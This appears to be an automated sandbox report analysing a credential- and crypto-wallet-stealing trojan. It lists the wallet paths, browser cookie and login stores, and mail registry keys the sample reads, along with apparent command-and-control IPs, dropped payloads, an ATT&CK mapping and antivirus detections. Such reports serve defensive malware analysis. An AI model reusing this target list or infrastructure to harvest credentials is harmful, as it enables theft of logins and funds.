                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*LT
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                        Source: Yara matchFile source: 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: a62ee169b8.exe PID: 7292, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        3
                        Obfuscated Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol4
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        12
                        Software Packing
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDS236
                        System Information Discovery
                        Distributed Component Object ModelInput Capture112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets761
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Process Injection
                        DCSync251
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1466647 Sample: file.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 16 other signatures 2->66 9 file.exe 37 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 3 other processes 2->18 process3 dnsIp4 56 85.28.47.4, 49710, 49728, 80 GES-ASRU Russian Federation 9->56 58 77.91.77.81, 49713, 49725, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->58 46 C:\Users\user\AppData\...\HCGCBFHCFC.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->50 dropped 52 11 other files (7 malicious) 9->52 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Tries to steal Mail credentials (via file / registry access) 9->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 9->96 104 4 other signatures 9->104 20 cmd.exe 1 9->20         started        22 cmd.exe 2 9->22         started        98 Hides threads from debuggers 14->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->100 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->102 file5 signatures6 process7 process8 24 HCGCBFHCFC.exe 4 20->24         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        file9 44 C:\Users\user\AppData\Local\...\explorti.exe, PE32 24->44 dropped 84 Antivirus detection for dropped file 24->84 86 Detected unpacking (changes PE section rights) 24->86 88 Machine Learning detection for dropped file 24->88 90 6 other signatures 24->90 32 explorti.exe 16 24->32         started        signatures10 process11 dnsIp12 54 77.91.77.82, 49724, 49727, 49729 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 32->54 40 C:\Users\user\AppData\...\a62ee169b8.exe, PE32 32->40 dropped 42 C:\Users\user\AppData\Local\...\random[1].exe, PE32 32->42 dropped 68 Antivirus detection for dropped file 32->68 70 Detected unpacking (changes PE section rights) 32->70 72 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->72 74 6 other signatures 32->74 37 a62ee169b8.exe 12 32->37         started        file13 signatures14 process15 signatures16 76 Antivirus detection for dropped file 37->76 78 Multi AV Scanner detection for dropped file 37->78 80 Detected unpacking (changes PE section rights) 37->80 82 2 other signatures 37->82

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe55%ReversingLabsWin32.Trojan.Stealerc
                        file.exe49%VirustotalBrowse
                        file.exe100%AviraTR/Crypt.ZPACK.Gen
                        file.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe55%ReversingLabsWin32.Trojan.Stealerc
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe55%ReversingLabsWin32.Trojan.Stealerc
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        http://upx.sf.net0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                        https://support.mozilla.org0%URL Reputationsafe
